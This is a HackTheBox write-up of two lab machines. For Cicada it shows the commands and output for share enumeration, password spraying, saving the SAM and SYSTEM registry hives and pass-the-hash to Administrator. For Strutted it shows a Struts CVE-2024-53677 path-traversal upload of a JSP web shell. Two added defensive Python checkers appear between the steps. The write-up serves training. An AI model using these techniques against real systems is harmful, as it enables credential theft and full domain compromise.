HackTheBox – Cicada Writeup

Hack The Box
app.hackthebox.com

This is the Writeup of HackTheBox “Cicada”.

User Flag

Perform a port scan.

$ nmap -Pn -sVC -T4 -A -p- 10.10.11.35 -oN nmap_result
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-27 13:49:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
63178/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
| smb2-time: 
|   date: 2025-01-27T13:50:45
|_  start_date: N/A

The open ports and the services behind them are now known.

Enumerate the SMB share names. Two non-default shares, DEV and HR, are present.

$ smbclient -L //cicada.htb
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

Connecting to the HR share, I found Notice from HR.txt.

$ smbclient //cicada.htb/HR 
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

                4168447 blocks of size 4096. 412399 blocks available

When I downloaded Notice from HR.txt and checked its contents, I found the default password: Cicada$M6Corpb*@Lp#nZp!8

Notice from HR.txt

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Now that the password is known, list the account names that might use it.
Brute-force the RIDs to enumerate the accounts.

$ nxc smb 10.10.11.35 -u 'test' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\test: (Guest)
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

I have created a file with a list of accounts that I found.

smb-users.txt

Administrator
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Identify accounts that can use the default password in a password spraying attack.

$ nxc smb 10.10.11.35 -u smb-users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'          
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

michael.wrightson seems to be using the default password.
Use the resulting credentials to enumerate the accounts in the domain.

$ nxc smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-  
SMB         10.10.11.35     445    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain               
SMB         10.10.11.35     445    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain             
SMB         10.10.11.35     445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 0       Key Distribution Center Service Account                              
SMB         10.10.11.35     445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1        
SMB         10.10.11.35     445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1        
SMB         10.10.11.35     445    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0        
SMB         10.10.11.35     445    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3                  
SMB         10.10.11.35     445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0        
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated 8 local users: CICADA

The Description field of david.orelious contains that account's password.
Enumerating the shares again as david.orelious shows that DEV, which was previously inaccessible, is now readable.

$ nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ            
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

Connecting to DEV and listing the directory reveals Backup_script.ps1.

$ smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

                4168447 blocks of size 4096. 420260 blocks available

When I downloaded Backup_script.ps1 and read it, I found the password of emily.oscars: Q!3@Lp#M6b*7t*Vt

Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
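The three credentials found so far (the default password in the HR notice, the password in the AD description of david.orelious, and the literal passed to ConvertTo-SecureString in Backup_script.ps1) are all plaintext secrets left in places any domain user can read. As an added example that is not part of the original writeup, the Python below is a small scanner a defender can run over share contents and directory attributes to catch exactly these patterns; the artifact texts and the source labels are constructed to mirror what this page shows.

```python
import re
from typing import Dict, List

# Constructed samples modelled on the three places this writeup found credentials.
# The source labels are illustrative; the secret values are the ones shown on the page.
SAMPLE_ARTIFACTS: Dict[str, str] = {
    "smb://CICADA-DC/HR/Notice from HR.txt":
        "Dear new hire!\n\nYour default password is: Cicada$M6Corpb*@Lp#nZp!8\n",
    "ldap:user=david.orelious,attr=description":
        "Just in case I forget my password is aRt$Lp#7t*VQ!3",
    "smb://CICADA-DC/DEV/Backup_script.ps1":
        '$username = "emily.oscars"\n'
        '$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force\n'
        '$credentials = New-Object System.Management.Automation.PSCredential($username, $password)\n',
}

# Each rule is (label, regex); group 1 of the regex is the secret.
RULES = [
    # PowerShell: a literal string fed to ConvertTo-SecureString is still plaintext on disk.
    ("ps-securestring-literal",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
    # Prose such as "password is: X" in notices, README files and AD description fields.
    ("password-in-prose",
     re.compile(r"password\s+is[:\s]+(\S+)", re.I)),
    # key=value / key: "value" forms common in config files.
    ("password-key-value",
     re.compile(r"(?:password|passwd|pwd)\s*[=:]\s*[\"']([^\"']+)[\"']", re.I)),
]

# Picks up the account a PowerShell credential object is built for.
USERNAME_RE = re.compile(r'\$username\s*=\s*"([^"]+)"')
SOURCE_USER_RE = re.compile(r"user=([^,]+)")


def mask(secret: str) -> str:
    """Mask a secret for reports; two leading characters are kept so findings can be correlated."""
    if len(secret) <= 2:
        return "***"
    return secret[:2] + "*" * (len(secret) - 2)


def find_credentials(artifacts: Dict[str, str]) -> List[dict]:
    """Scan every artifact against RULES and return one finding per distinct secret per source."""
    findings: List[dict] = []
    for source, text in artifacts.items():
        seen = set()
        user_match = USERNAME_RE.search(text) or SOURCE_USER_RE.search(source)
        username = user_match.group(1) if user_match else None
        for label, rule in RULES:
            for match in rule.finditer(text):
                secret = match.group(1)
                if secret in seen:
                    continue
                seen.add(secret)
                findings.append({
                    "source": source,
                    "rule": label,
                    "username": username,
                    "secret": secret,
                    "masked": mask(secret),
                })
    return findings


def report(findings: List[dict]) -> str:
    """One line per finding with the secret masked, suitable for a remediation ticket."""
    return "\n".join(
        f"{f['source']} [{f['rule']}] user={f['username'] or '?'} secret={f['masked']}"
        for f in findings
    )


if __name__ == "__main__":
    print(report(find_credentials(SAMPLE_ARTIFACTS)))
```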

Enumerating the shares as emily.oscars shows that ADMIN$ is readable and C$ is readable and writable.
This account has more permissions than the others.

$ nxc smb 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$          READ            Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$              READ,WRITE      Default share
SMB         10.10.11.35     445    CICADA-DC        DEV
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

I was able to connect remotely as emily.oscars with Evil-WinRM.

$ evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                                   
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

I was able to get the user flag from C:\Users\emily.oscars.CICADA\Desktop\user.txt.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> more user.txt
850e88885d9cc255bd699fe0e1372612

Root Flag

Check the permissions of emily.oscars.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

SeBackupPrivilege and SeRestorePrivilege are enabled, so it seems possible to elevate privileges from there.
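Membership of Backup Operators is what gives emily.oscars these two privileges, and it is the kind of assignment a hardening review should catch before an attacker does. As an added helper that is not part of the original writeup, the Python below parses whoami /all output and flags the well-known groups and privileges that bypass normal ACLs; the input is a constructed copy of the output shown above, trimmed to the relevant rows.

```python
import re
from typing import Dict, List

# Constructed copy of the whoami /all output shown above for emily.oscars,
# trimmed to the rows that matter for the assessment.
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

SID_RE = re.compile(r"(S-1-[\d-]+)")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")

# Well-known SIDs and privileges that a hardening review flags on a non-admin account.
RISKY_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators: can manage most domain accounts",
    "S-1-5-32-549": "Server Operators: can manage services and shares on DCs",
    "S-1-5-32-551": "Backup Operators: grants SeBackup/SeRestore, i.e. read and write of any file on the DC",
}
RISKY_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of ACL, including the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeDebugPrivilege": "attach to any process, including protected ones",
    "SeImpersonatePrivilege": "impersonate client tokens",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def parse_whoami_all(text: str) -> Dict:
    """Split whoami /all into user, group list and privilege map by walking its sections."""
    result: Dict = {"user": None, "groups": [], "privileges": {}}
    section = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("INFORMATION"):
            section = line
            continue
        # Skip blank lines and the '----'/'====' rulers.
        if not line or set(line) <= {"-", "=", " "}:
            continue
        if section == "USER INFORMATION":
            m = SID_RE.search(line)
            if m:
                result["user"] = line[: m.start()].strip()
        elif section == "GROUP INFORMATION":
            m = SID_RE.search(line)
            if not m:
                continue
            # Name and Type are separated by two or more spaces; the SID anchors the split.
            cols = re.split(r"\s{2,}", line[: m.start()].strip())
            result["groups"].append({"name": cols[0], "type": cols[-1] if len(cols) > 1 else "", "sid": m.group(1)})
        elif section == "PRIVILEGES INFORMATION":
            m = PRIV_RE.match(line)
            if m:
                result["privileges"][m.group(1)] = m.group(3)
    return result


def assess(parsed: Dict) -> List[str]:
    """Return one finding per risky group membership or privilege (disabled ones count too:
    a process can re-enable a privilege that is present in its token)."""
    findings = []
    for g in parsed["groups"]:
        if g["sid"] in RISKY_GROUPS:
            findings.append(f"group {g['name']} ({g['sid']}): {RISKY_GROUPS[g['sid']]}")
    for name, state in parsed["privileges"].items():
        if name in RISKY_PRIVILEGES:
            findings.append(f"privilege {name} ({state}): {RISKY_PRIVILEGES[name]}")
    return findings


if __name__ == "__main__":
    parsed = parse_whoami_all(SAMPLE_WHOAMI)
    print("token for:", parsed["user"])
    for finding in assess(parsed):
        print(" -", finding)
```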


Create C:\Temp and move into it.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir C:\


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/22/2024  11:45 AM                PerfLogs
d-r---         8/29/2024  12:32 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-----         3/14/2024   5:21 AM                Shares
d-r---         8/26/2024   1:11 PM                Users
d-----         9/23/2024   9:35 AM                Windows


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd c:\
*Evil-WinRM* PS C:\> mkdir Temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/20/2025   4:49 AM                Temp


*Evil-WinRM* PS C:\> cd Temp

Save the SAM and SYSTEM registry hives.

*Evil-WinRM* PS C:\Temp> reg save hklm\sam c:\Temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\Temp> reg save hklm\system c:\Temp\system
The operation completed successfully.

Download the two saved files.

*Evil-WinRM* PS C:\Temp> download sam
                                        
Info: Downloading C:\Temp\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
                                        
Info: Downloading C:\Temp\system to system
                                        
Info: Download successful!

The Administrator hash was obtained from the two files.

$ impacket-secretsdump -sam sam -system system LOCAL 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Connecting remotely with the obtained hash value succeeded.

$ evil-winrm -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341' -i 10.10.11.35
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                                   
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator

I was able to get the root flag from C:\Users\Administrator\Desktop\root.txt.

*Evil-WinRM* PS C:\Users\Administrator\Documents> more ..\Desktop\root.txt
4e844fb08f08b23900d88a4def5e1ae4

HackTheBox – Strutted Writeup


This is a writeup of HackTheBox “Strutted”.


User Flag

Perform a port scan.

$ nmap -Pn -sCV -A -T4 -p- 10.10.11.59 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://strutted.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The open ports and the services behind them are now known.

port  service  version
22    ssh      OpenSSH 8.9p1
80    http     nginx 1.18.0

Now that I know the domain name, I add it to /etc/hosts.

10.10.11.59     strutted.htb

Go to http://strutted.htb/.

I was able to download the website's source code from the Download link at the top right.

pom.xml shows that Apache Struts 6.3.0.1 is used as the framework.


strutted/pom.xml

(omitted)

<properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    <maven.compiler.source>17</maven.compiler.source>
    <maven.compiler.target>17</maven.compiler.target>
    <struts2.version>6.3.0.1</struts2.version>
    <jetty-plugin.version>9.4.46.v20220331</jetty-plugin.version>
    <maven.javadoc.skip>true</maven.javadoc.skip>
    <jackson.version>2.14.1</jackson.version>
    <jackson-data-bind.version>2.14.1</jackson-data-bind.version>
</properties>

Searching for "apache struts cve 2024" turned up an RCE vulnerability, CVE-2024-53677.

The vulnerability appears to allow arbitrary files to be uploaded to arbitrary directories via path traversal.
As a result, it seems that it can be connected to RCE by uploading a malicious JSP file.


When I checked the code of the file upload function, I found that only jpeg, png and gif are allowed.

/strutted/src/main/java/org/strutted/htb/Upload.java

private boolean isAllowedContentType(String contentType) {
    String[] allowedTypes = {"image/jpeg", "image/png", "image/gif"};
    for (String allowedType : allowedTypes) {
        if (allowedType.equalsIgnoreCase(contentType)) {
            return true;
        }
    }
    return false;
}

Look at how the file type is determined.
The upload restriction is based on the file's magic number.

/strutted/src/main/java/org/strutted/htb/Upload.java

private boolean isImageByMagicBytes(File file) {
    byte[] header = new byte[8];
    try (InputStream in = new FileInputStream(file)) {
        // Only the first 8 bytes of the file are ever inspected.
        int bytesRead = in.read(header, 0, 8);
        if (bytesRead < 8) {
            return false;
        }

        // JPEG
        if (header[0] == (byte)0xFF && header[1] == (byte)0xD8 && header[2] == (byte)0xFF) {
            return true;
        }

        // PNG
        if (header[0] == (byte)0x89 && header[1] == (byte)0x50 && header[2] == (byte)0x4E && header[3] == (byte)0x47) {
            return true;
        }

        // GIF (GIF87a or GIF89a)
        if (header[0] == (byte)0x47 && header[1] == (byte)0x49 && header[2] == (byte)0x46 &&
            header[3] == (byte)0x38 && (header[4] == (byte)0x37 || header[4] == (byte)0x39) && header[5] == (byte)0x61) {
            return true;
        }

        // No known signature matched (the page's excerpt ends above; this closing part is reconstructed)
        return false;
    } catch (IOException e) {
        return false;
    }
}

I created a test jpeg file with a magic number and successfully uploaded the file.

$ print '\xFF\xD8\xFF' > test.jpeg
$ echo 'hello' >> test.jpeg

Looking at various PoCs, it seems that JSP code can be placed after the magic number.
The JSP web shell used here was taken from a public PoC.

An excerpt of the Body of the POST request is as follows.


(omitted)

-----------------------------270809347519694441851360887477
Content-Disposition: form-data; name="Upload"; filename="test.jpeg"
Content-Type: image/jpeg

ÿØÿ
<%@ page import="java.io.*, java.util.*, java.net.*" %>
<%

(omitted)

%>
-----------------------------270809347519694441851360887477
Content-Disposition: form-data; name="top.UploadFileName"

../../revshell.jsp
-----------------------------270809347519694441851360887477--

Note that the trailing -- must not be added to the boundary between the name="Upload" part and the name="top.UploadFileName" part.
If it is, the path traversal fails.

If the upload succeeds, the response shows that the file was written to uploads/20250408_144513/../../revshell.jsp.
